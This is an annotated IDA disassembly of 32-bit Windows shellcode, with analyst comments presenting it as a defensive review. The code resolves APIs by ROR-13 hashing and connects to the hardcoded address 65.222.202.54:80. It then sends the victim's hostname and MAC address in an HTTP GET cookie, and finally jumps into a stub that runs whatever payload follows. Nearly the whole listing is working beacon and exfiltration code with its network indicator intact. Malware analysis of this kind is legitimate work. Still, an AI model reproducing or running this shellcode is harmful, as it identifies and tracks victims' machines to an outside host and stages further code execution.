seg000:00000000 ; Segment type: Pure code
;-----------------------------------------------------------------------------
; Analyst notes (defensive review of this IDA listing; 32-bit Windows shellcode).
; Every data reference is [ebp+disp] with ebp = 0x00000007, the address of the
; API resolver, which sub_91 obtains by popping its own return address.
;
; Layout:
;   0x0000  entry: pusha / cld / call sub_91
;   0x0007  API resolver: walks PEB->Ldr->InMemoryOrderModuleList, hashes each
;           module name (upper-cased) and each export name with a ROR-13/add
;           hash and tail-jumps to the export whose module+name hash equals the
;           dword the caller pushed before "call ebp". The shape matches the
;           well-known "block_api" resolver pattern (identification by pattern,
;           not proof of origin). No exit is visible when no hash matches — the
;           module loop just keeps following Flink (sandbox/hang caveat).
;   0x0090  dbCnt: connect() retry counter (5)
;   0x0091  sub_91: main logic — LoadLibraryA("ws2_32"), LoadLibraryA("IPHLPAPI"),
;           WSAStartup, WSASocketA(AF_INET, SOCK_STREAM), connect() to the
;           sockaddr_in at 0x2E8, gethostname, gethostbyname -> own IPv4,
;           SendARP(own IP) -> own MAC, then build
;           "GET /<uuid> HTTP/1.1\r\nHost: <hostname>\r\nCookie: ID=<12 hex>"
;           + trailer headers, send(), closesocket(). Every path (success or
;           failure) finally jumps into a 14-byte stub that was appended to the
;           request buffer; the stub skips zero bytes and jumps to whatever
;           non-zero bytes follow the shellcode (not shown in this listing).
;   0x0246  sub_246: strlen (edi -> ecx = length, edi = one past the NUL)
;   0x0252  4-byte slot: write cursor into the request buffer
;   0x0256  1-byte flag: set to 1 once the request has been fully built
;   0x0257  sub_257: append trailer + continuation stub; falls into sub_270
;   0x0270  sub_270: strlen of the request buffer, then retn
;   0x027C  trailer headers (65 bytes); 0x02BD continuation stub (14 bytes);
;           0x02CB "\r\nCookie: ID="; 0x02D8 "ws2_32"; 0x02DF "IPHLPAPI";
;           0x02E8 sockaddr_in; 0x02F0 GET request template
;
; Network indicator: sockaddr_in {sin_family = 2 (AF_INET), sin_port = 00 50 ->
;   80, sin_addr = 41 DE CA 36} -> 65.222.202.54:80 (decoded from the two dwords
;   at 0x2E8 — verify against the raw bytes). Request path:
;   /05cea4de-951d-4037-bf8f-f69055b279bb. Data sent: hostname (capped at 32
;   bytes) and the host's own MAC as 12 upper-case hex digits in "Cookie: ID=".
;   No recv() appears in this listing; the reply is not read here.
;-----------------------------------------------------------------------------
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 pusha                                   ; save the caller's registers
seg000:00000001 cld                                     ; string ops ascend (lodsb/movsb/scasb below rely on it)
seg000:00000002 call sub_91                             ; pushes 0x7 (the resolver's address); sub_91 pops it into ebp
seg000:00000007 pusha                                   ; resolver entry, reached by "push hash / call ebp"; after pusha the hash is at [esp+24h]
seg000:00000008 mov ebp, esp
seg000:0000000A xor edx, edx
seg000:0000000C mov edx, fs:[edx+30h]                   ; PEB
seg000:00000010 mov edx, [edx+0Ch]                      ; PEB->Ldr
seg000:00000013 mov edx, [edx+14h]                      ; Ldr->InMemoryOrderModuleList.Flink
seg000:00000016
seg000:00000016 loc_16: ; CODE XREF: seg000:0000008Ej   ; per-module loop
seg000:00000016 mov esi, [edx+28h]                      ; BaseDllName.Buffer (UTF-16)
seg000:00000019 movzx ecx, word ptr [edx+26h]           ; BaseDllName.MaximumLength (bytes)
seg000:0000001D xor edi, edi                            ; edi = module-name hash
seg000:0000001F
seg000:0000001F loc_1F: ; CODE XREF: seg000:0000002Dj
seg000:0000001F xor eax, eax
seg000:00000021 lodsb                                   ; one byte of the UTF-16 name (NUL high bytes hash as 0)
seg000:00000022 cmp al, 61h ; 'a'
seg000:00000024 jl short loc_28
seg000:00000026 sub al, 20h ; ' '                       ; fold to upper case
seg000:00000028
seg000:00000028 loc_28: ; CODE XREF: seg000:00000024j
seg000:00000028 ror edi, 0Dh                            ; ROR-13 additive hash
seg000:0000002B add edi, eax
seg000:0000002D loop loc_1F
seg000:0000002F push edx                                ; [ebp-4] = list entry
seg000:00000030 push edi                                ; [ebp-8] = module hash
seg000:00000031 mov edx, [edx+10h]                      ; DllBase
seg000:00000034 mov eax, [edx+3Ch]                      ; e_lfanew
seg000:00000037 add eax, edx                            ; IMAGE_NT_HEADERS
seg000:00000039 mov eax, [eax+78h]                      ; export directory RVA
seg000:0000003C test eax, eax
seg000:0000003E jz short loc_8A                         ; no exports -> next module
seg000:00000040 add eax, edx                            ; IMAGE_EXPORT_DIRECTORY
seg000:00000042 push eax                                ; [ebp-0Ch] = export directory
seg000:00000043 mov ecx, [eax+18h]                      ; NumberOfNames
seg000:00000046 mov ebx, [eax+20h]                      ; AddressOfNames RVA
seg000:00000049 add ebx, edx
seg000:0000004B
seg000:0000004B loc_4B: ; CODE XREF: seg000:00000067j   ; per-export loop, walked from the last name down
seg000:0000004B jecxz short loc_89                      ; names exhausted -> next module
seg000:0000004D dec ecx
seg000:0000004E mov esi, [ebx+ecx*4]                    ; name RVA
seg000:00000051 add esi, edx
seg000:00000053 xor edi, edi                            ; edi = export-name hash
seg000:00000055
seg000:00000055 loc_55: ; CODE XREF: seg000:0000005Fj
seg000:00000055 xor eax, eax
seg000:00000057 lodsb
seg000:00000058 ror edi, 0Dh
seg000:0000005B add edi, eax
seg000:0000005D cmp al, ah                              ; ah == 0: the terminating NUL is hashed, then the loop stops
seg000:0000005F jnz short loc_55
seg000:00000061 add edi, [ebp-8]                        ; module hash + export hash
seg000:00000064 cmp edi, [ebp+24h]                      ; requested hash (dword pushed by the caller)
seg000:00000067 jnz short loc_4B
seg000:00000069 pop eax                                 ; export directory
seg000:0000006A mov ebx, [eax+24h]                      ; AddressOfNameOrdinals RVA
seg000:0000006D add ebx, edx
seg000:0000006F mov cx, [ebx+ecx*2]                     ; ordinal of the matching name
seg000:00000073 mov ebx, [eax+1Ch]                      ; AddressOfFunctions RVA
seg000:00000076 add ebx, edx
seg000:00000078 mov eax, [ebx+ecx*4]
seg000:0000007B add eax, edx                            ; resolved function VA
seg000:0000007D mov [esp+24h], eax                      ; overwrite the eax slot that pusha saved (esp = ebp-8 here)
seg000:00000081 pop ebx                                 ; discard module hash
seg000:00000082 pop ebx                                 ; discard list entry
seg000:00000083 popa                                    ; eax = function address, other registers restored
seg000:00000084 pop ecx                                 ; caller's return address
seg000:00000085 pop edx                                 ; drop the hash
seg000:00000086 push ecx                                ; return address back on top of the API arguments
seg000:00000087 jmp eax                                 ; tail-jump: the API returns straight to the resolver's caller
seg000:00000089 ; ---------------------------------------------------------------------------
seg000:00000089
seg000:00000089 loc_89: ; CODE XREF: seg000:loc_4Bj
seg000:00000089 pop eax                                 ; discard export directory
seg000:0000008A
seg000:0000008A loc_8A: ; CODE XREF: seg000:0000003Ej
seg000:0000008A pop edi
seg000:0000008B pop edx
seg000:0000008C mov edx, [edx]                          ; Flink -> next module
seg000:0000008E jmp short loc_16
seg000:0000008E ; ---------------------------------------------------------------------------
seg000:00000090 dbCnt db 5                              ; connect() retries; decremented via [ebp+89h] at 0x106
seg000:00000091
seg000:00000091 ; =============== S U B R O U T I N E =======================================
seg000:00000091
; sub_91: main logic. Entered once via the call at 0x2; pops its return
; address (0x7) into ebp so that "push hash / call ebp" resolves an API and all
; data is addressed as [ebp+disp]. Never returns: every path ends in the
; "jmp edi" at 0x123. ebx holds the socket once WSASocketA succeeds.
seg000:00000091 sub_91 proc near ; CODE XREF: seg000:00000002p
seg000:00000091 pop ebp                                 ; ebp = 0x7 = address of the API resolver
seg000:00000092 cmp dword ptr [ebp+2E9h], 20544547h     ; 0x2F0: does the template still start with 'GET ' (bytes 47 45 54 20)?
seg000:0000009C jnz short loc_10E                       ; template absent/patched -> skip networking, go to the continuation
seg000:0000009E lea eax, [ebp+2D1h] ; 0x2d8, ws2_32
seg000:000000A4 push eax
seg000:000000A5 push 726774Ch ; LoadLibraryA_salt
seg000:000000AA call ebp                                ; LoadLibraryA("ws2_32")
seg000:000000AC test eax, eax
seg000:000000AE jz short loc_10E
seg000:000000B0 lea eax, [ebp+2D8h] ; 0x2df,IPHLPAPI
seg000:000000B6 push eax
seg000:000000B7 push 726774Ch ; LoadLibraryA_salt
seg000:000000BC call ebp                                ; LoadLibraryA("IPHLPAPI") — needed for SendARP below
seg000:000000BE test eax, eax
seg000:000000C0 jz short loc_10E
seg000:000000C2 mov ebx, 190h                           ; 0x190 serves as both the WSADATA size and wVersionRequested
seg000:000000C7 sub esp, ebx                            ; WSADATA on the stack
seg000:000000C9 push esp                                ; lpWSAData
seg000:000000CA push ebx                                ; wVersionRequested
seg000:000000CB push 6B8029h ; WSAStartup_salt
seg000:000000D0 call ebp                                ; WSAStartup
seg000:000000D2 add esp, ebx
seg000:000000D4 test eax, eax
seg000:000000D6 jnz short loc_10E                       ; non-zero = failure
seg000:000000D8 push eax                                ; dwFlags = 0
seg000:000000D9 push eax                                ; g = 0
seg000:000000DA push eax                                ; lpProtocolInfo = 0
seg000:000000DB push eax                                ; protocol = 0
seg000:000000DC inc eax
seg000:000000DD push eax                                ; type = 1 (SOCK_STREAM)
seg000:000000DE inc eax
seg000:000000DF push eax                                ; af = 2 (AF_INET)
seg000:000000E0 push 0E0DF0FEAh ; WSASocketA_salt
seg000:000000E5 call ebp                                ; WSASocketA
seg000:000000E7 xor ebx, ebx
seg000:000000E9 not ebx                                 ; ebx = -1 = INVALID_SOCKET
seg000:000000EB cmp ebx, eax
seg000:000000ED jz short loc_10E
seg000:000000EF mov ebx, eax                            ; ebx = socket for the rest of sub_91
seg000:000000F1
seg000:000000F1 loc_F1: ; CODE XREF: sub_91+7Bj         ; connect retry loop
seg000:000000F1 push 10h                                ; namelen = sizeof(sockaddr_in)
seg000:000000F3 lea esi, [ebp+2E1h]                     ; 0x2E8: sockaddr_in (AF_INET, port 80, 0x36CADE41); its sin_zero overlaps the GET template
seg000:000000F9 push esi
seg000:000000FA push ebx
seg000:000000FB push 6174A599h ; connect_salt
seg000:00000100 call ebp                                ; connect
seg000:00000102 test eax, eax
seg000:00000104 jz short loc_125                        ; connected
seg000:00000106 dec byte ptr [ebp+89h] ; dbCnt          ; 0x90: up to 5 attempts, no delay between them
seg000:0000010C jnz short loc_F1
seg000:0000010E
seg000:0000010E loc_10E: ; CODE XREF: sub_91+Bj
seg000:0000010E ; sub_91+1Dj ...
seg000:0000010E ; Common exit: reached on every failure path and after the request was sent.
seg000:0000010E cmp byte ptr [ebp+24Fh], 1              ; 0x256: trailer + stub already appended (set at 0x21D)?
seg000:00000115 jz short loc_11E
seg000:00000117 call sub_257                            ; append trailer + continuation stub to the request buffer; falls into sub_270
seg000:0000011C jmp short loc_123
seg000:0000011E ; ---------------------------------------------------------------------------
seg000:0000011E
seg000:0000011E loc_11E: ; CODE XREF: sub_91+84j
seg000:0000011E call sub_270                            ; edi = one past the NUL ending the request buffer
seg000:00000123
seg000:00000123 loc_123: ; CODE XREF: sub_91+8Bj
seg000:00000123 jmp edi                                 ; runs the 14-byte stub copied after the trailer (original at 0x2BD)
seg000:00000125 ; ---------------------------------------------------------------------------
seg000:00000125
seg000:00000125 loc_125: ; CODE XREF: sub_91+73j        ; connected: collect hostname and MAC, build and send the request
seg000:00000125 mov eax, 100h
seg000:0000012A sub esp, eax                            ; 256-byte hostname buffer
seg000:0000012C mov edx, esp
seg000:0000012E push edx                                ; saved buffer pointer (popped into edi after the call)
seg000:0000012F push eax                                ; namelen = 256
seg000:00000130 push edx                                ; name
seg000:00000131 push 1DE49B6h ; gethostname_salt
seg000:00000136 call ebp                                ; gethostname
seg000:00000138 pop edi                                 ; edi = hostname buffer
seg000:00000139 add esp, 100h                           ; buffer released while edi still points into it (below esp from here on)
seg000:0000013F test eax, eax
seg000:00000141 jnz loc_239                             ; SOCKET_ERROR -> closesocket
seg000:00000147 push edi
seg000:00000148 call sub_246                            ; ecx = strlen(hostname)
seg000:0000014D pop esi                                 ; esi = hostname
seg000:0000014E mov edx, ecx                            ; edx = hostname length
seg000:00000150 lea edi, [ebp+2E9h]                     ; 0x2F0: request buffer
seg000:00000156 call sub_246                            ; edi = one past its NUL
seg000:0000015B dec edi                                 ; edi = the NUL after "Host: "
seg000:0000015C cmp edx, 20h ; ' '
seg000:0000015F jl short loc_166
seg000:00000161 mov edx, 20h ; ' '                      ; cap the hostname at 32 bytes (signed compare)
seg000:00000166
seg000:00000166 loc_166: ; CODE XREF: sub_91+CEj
seg000:00000166 mov ecx, edx
seg000:00000168 push esi                                ; keep the hostname pointer across rep movsb
seg000:00000169 rep movsb                               ; append hostname after "Host: "
seg000:0000016B mov ecx, 0Dh
seg000:00000170 lea esi, [ebp+2C4h]                     ; 0x2CB: "\r\nCookie: ID=" (13 bytes)
seg000:00000176 rep movsb
seg000:00000178 mov [ebp+24Bh], edi                     ; 0x252: remember where the MAC hex digits go
seg000:0000017E pop esi
seg000:0000017F push esi
seg000:00000180 push 803428A9h ; gethostbyname_salt
seg000:00000185 call ebp                                ; gethostbyname(hostname)
seg000:00000187 test eax, eax
seg000:00000189 jz loc_239
seg000:0000018F mov cx, [eax+0Ah]                       ; hostent->h_length
seg000:00000193 cmp cx, 4
seg000:00000197 jb loc_239                              ; need an IPv4-sized address
seg000:0000019D lea eax, [eax+0Ch]                      ; &hostent->h_addr_list
seg000:000001A0 mov eax, [eax]
seg000:000001A2 mov ecx, [eax]                          ; h_addr_list[0]
seg000:000001A4 mov ecx, [ecx]                          ; first IPv4 address, as stored (network byte order)
seg000:000001A6 mov eax, 100h
seg000:000001AB push eax                                ; PhyAddrLen = 256
seg000:000001AC mov edi, esp                            ; edi = &PhyAddrLen
seg000:000001AE sub esp, eax                            ; 256-byte MAC buffer
seg000:000001B0 mov esi, esp                            ; esi = MAC buffer
seg000:000001B2 push edi                                ; PhyAddrLen
seg000:000001B3 push esi                                ; pMacAddr
seg000:000001B4 push ecx                                ; SrcIP = own address
seg000:000001B5 push ecx                                ; DestIP = own address -> yields the host's own MAC
seg000:000001B6 push 0B8D27248h ; SendARP_salt
seg000:000001BB call ebp                                ; SendARP
seg000:000001BD test eax, eax                           ; ZF set here ...
seg000:000001BF add esp, 104h                           ; ... but add rewrites the flags: SendARP's return value is never acted on
seg000:000001C5 movzx ecx, word ptr [edi]               ; low word of PhyAddrLen (slot is now below esp)
seg000:000001C8 cmp ecx, 6
seg000:000001CB jb short loc_239                        ; fewer than 6 bytes returned -> give up
seg000:000001CD mov ecx, 6                              ; encode exactly 6 bytes
seg000:000001D2 mov eax, 10h
seg000:000001D7 sub esp, eax                            ; 16-byte hex output buffer
seg000:000001D9 mov edi, esp
seg000:000001DB mov edx, ecx
seg000:000001DD shl edx, 1                              ; 12 output characters
seg000:000001DF push eax                                ; save 0x10
seg000:000001E0 push edx                                ; save 12
seg000:000001E1
seg000:000001E1 loc_1E1: ; CODE XREF: sub_91+17Aj       ; hex-encode loop, one MAC byte per iteration
seg000:000001E1 xor edx, edx
seg000:000001E3 mov dl, [esi]
seg000:000001E5 mov al, dl
seg000:000001E7 and al, 0F0h
seg000:000001E9 shr al, 4                               ; high nibble
seg000:000001EC cmp al, 9
seg000:000001EE ja short loc_1F4
seg000:000001F0 add al, 30h ; '0'                       ; 0..9 -> '0'..'9'
seg000:000001F2 jmp short loc_1F6
seg000:000001F4 ; ---------------------------------------------------------------------------
seg000:000001F4
seg000:000001F4 loc_1F4: ; CODE XREF: sub_91+15Dj
seg000:000001F4 add al, 37h ; '7'                       ; 10..15 -> 'A'..'F' (upper case)
seg000:000001F6
seg000:000001F6 loc_1F6: ; CODE XREF: sub_91+161j
seg000:000001F6 mov [edi], al
seg000:000001F8 inc edi
seg000:000001F9 mov al, dl
seg000:000001FB and al, 0Fh                             ; low nibble
seg000:000001FD cmp al, 9
seg000:000001FF ja short loc_205
seg000:00000201 add al, 30h ; '0'
seg000:00000203 jmp short loc_207
seg000:00000205 ; ---------------------------------------------------------------------------
seg000:00000205
seg000:00000205 loc_205: ; CODE XREF: sub_91+16Ej
seg000:00000205 add al, 37h ; '7'
seg000:00000207
seg000:00000207 loc_207: ; CODE XREF: sub_91+172j
seg000:00000207 mov [edi], al
seg000:00000209 inc edi
seg000:0000020A inc esi
seg000:0000020B loop loc_1E1
seg000:0000020D pop ecx                                 ; ecx = 12
seg000:0000020E sub edi, ecx                            ; edi = start of the hex buffer
seg000:00000210 mov esi, edi
seg000:00000212 pop eax                                 ; eax = 0x10
seg000:00000213 add esp, eax                            ; hex buffer released; esi still points into it
seg000:00000215 mov edi, [ebp+24Bh]                     ; 0x252: cursor right after "Cookie: ID="
seg000:0000021B rep movsb                               ; append the 12 hex digits
seg000:0000021D mov byte ptr [ebp+24Fh], 1              ; 0x256: mark the request as complete
seg000:00000224 call sub_257                            ; append trailer + stub; via sub_270: ecx = request length, edi = one past its NUL
seg000:00000229 xor eax, eax
seg000:0000022B push eax                                ; flags = 0
seg000:0000022C push ecx                                ; len
seg000:0000022D sub edi, ecx
seg000:0000022F dec edi                                 ; edi = start of the request buffer (0x2F0)
seg000:00000230 push edi                                ; buf
seg000:00000231 push ebx                                ; s
seg000:00000232 push 5F38EBC2h ; send_salt
seg000:00000237 call ebp                                ; send — return value not checked, falls into closesocket
seg000:00000239
seg000:00000239 loc_239: ; CODE XREF: sub_91+B0j
seg000:00000239 ; sub_91+F8j ...
seg000:00000239 push ebx
seg000:0000023A push 614D6E75h ; closesocket_salt
seg000:0000023F call ebp                                ; closesocket
seg000:00000241 jmp loc_10E                             ; -> flag decides sub_257 vs sub_270, then jmp edi into the stub
seg000:00000241 sub_91 endp ; sp-analysis failed
seg000:00000241
seg000:00000246
seg000:00000246 ; =============== S U B R O U T I N E =======================================
seg000:00000246
; sub_246: strlen. In: edi = NUL-terminated string. Out: ecx = length (without
; the NUL), edi = one past the NUL, eax = 0. Unbounded: scans until a zero byte.
seg000:00000246 sub_246 proc near ; CODE XREF: sub_91+B7p
seg000:00000246 ; sub_91+C5p ...
seg000:00000246 xor ecx, ecx
seg000:00000248 not ecx                                 ; ecx = -1 (no length limit)
seg000:0000024A xor eax, eax                            ; scan for 0
seg000:0000024C repne scasb
seg000:0000024E not ecx                                 ; bytes scanned, including the NUL
seg000:00000250 dec ecx                                 ; length without the NUL
seg000:00000251 retn
seg000:00000251 sub_246 endp
seg000:00000251
seg000:00000251 ; ---------------------------------------------------------------------------
seg000:00000252 db 0                                    ; 0x252..0x255: dword written at 0x178 / read at 0x215 (request write cursor)
seg000:00000253 db 0
seg000:00000254 db 0
seg000:00000255 db 0
seg000:00000256 db 0                                    ; 0x256: flag tested at 0x10E, set at 0x21D
seg000:00000257
seg000:00000257 ; =============== S U B R O U T I N E =======================================
seg000:00000257
; sub_257: copy 0x4F bytes from 0x27C — the 65-byte trailer headers plus the
; 14-byte continuation stub at 0x2BD — over the NUL that ends the request
; buffer. Has no retn: falls through into sub_270, which re-measures the
; buffer and returns on its behalf (so the caller gets ecx = length,
; edi = one past the NUL, i.e. the first byte of the copied stub).
seg000:00000257 sub_257 proc near ; CODE XREF: sub_91+86p
seg000:00000257 ; sub_91+193p
seg000:00000257 lea edi, [ebp+2E9h]                     ; 0x2F0: request buffer
seg000:0000025D call sub_246                            ; edi = one past its NUL
seg000:00000262 dec edi                                 ; edi = the NUL
seg000:00000263 mov ecx, 4Fh ; 'O'                      ; 0x4F = 0x41 bytes of headers + 0x0E bytes of stub
seg000:00000268 lea esi, [ebp+275h]                     ; 0x27C: aConnectionKeep
seg000:0000026E rep movsb
seg000:0000026E sub_257 endp ; sp-analysis failed       ; falls into sub_270
seg000:0000026E
seg000:00000270
seg000:00000270 ; =============== S U B R O U T I N E =======================================
seg000:00000270
; sub_270: measure the request buffer. Out: ecx = its length, edi = one past
; its NUL. Also serves as the return path for sub_257.
seg000:00000270 sub_270 proc near ; CODE XREF: sub_91:loc_11Ep
seg000:00000270 lea edi, [ebp+2E9h]                     ; 0x2F0: request buffer
seg000:00000276 call sub_246
seg000:0000027B retn
seg000:0000027B sub_270 endp
seg000:0000027B
seg000:0000027B ; ---------------------------------------------------------------------------
seg000:0000027C aConnectionKeep db 0Dh,0Ah              ; 0x27C..0x2BC: 65 bytes, copied by sub_257 together with the stub below
seg000:0000027C db 'Connection: keep-alive',0Dh,0Ah
seg000:0000027C db 'Accept: */*',0Dh,0Ah
seg000:0000027C db 'Accept-Encoding: gzip',0Dh,0Ah
seg000:0000027C db 0Dh,0Ah,0                            ; the NUL is copied too; sub_270 later measures up to it
seg000:000002BD ; ---------------------------------------------------------------------------
; 0x2BD..0x2CA: continuation stub (14 bytes). Not referenced as code in place;
; sub_257 copies it into the request buffer and "jmp edi" at 0x123 enters the copy.
seg000:000002BD add edi, 0Eh                            ; skip the stub's own 14 bytes
seg000:000002C0 xor ecx, ecx
seg000:000002C2 not ecx                                 ; unbounded scan
seg000:000002C4 xor eax, eax
seg000:000002C6 repe scasb                              ; advance over zero bytes
seg000:000002C8 dec edi                                 ; edi = first non-zero byte after the padding
seg000:000002C9 jmp edi                                 ; control leaves this listing; whatever follows the shellcode is not shown here
seg000:000002C9 ; ---------------------------------------------------------------------------
seg000:000002CB aCookieId db 0Dh,0Ah                    ; 0x2CB: 13 bytes appended after the hostname at 0x176
seg000:000002CB db 'Cookie: ID='
seg000:000002D8 aWs2_32 db 'ws2_32',0                   ; LoadLibraryA argument (0x9E)
seg000:000002DF aIphlpapi db 'IPHLPAPI',0               ; LoadLibraryA argument (0xB0)
seg000:000002E8 dd 50000002h                            ; sockaddr_in: sin_family = 2 (AF_INET), sin_port bytes 00 50 -> port 80
seg000:000002EC dd 36CADE41h                            ; sin_addr bytes 41 DE CA 36 -> 65.222.202.54 (decoded here; verify)
seg000:000002F0 aGet05cea4de951 db 'GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1',0Dh,0Ah   ; request template; hostname, cookie, MAC hex and trailer are appended in place, past the end of this listing
seg000:000002F0 db 'Host: ',0                           ; the 'GET ' check at 0x92 reads the first dword of this template
seg000:0000032B db 0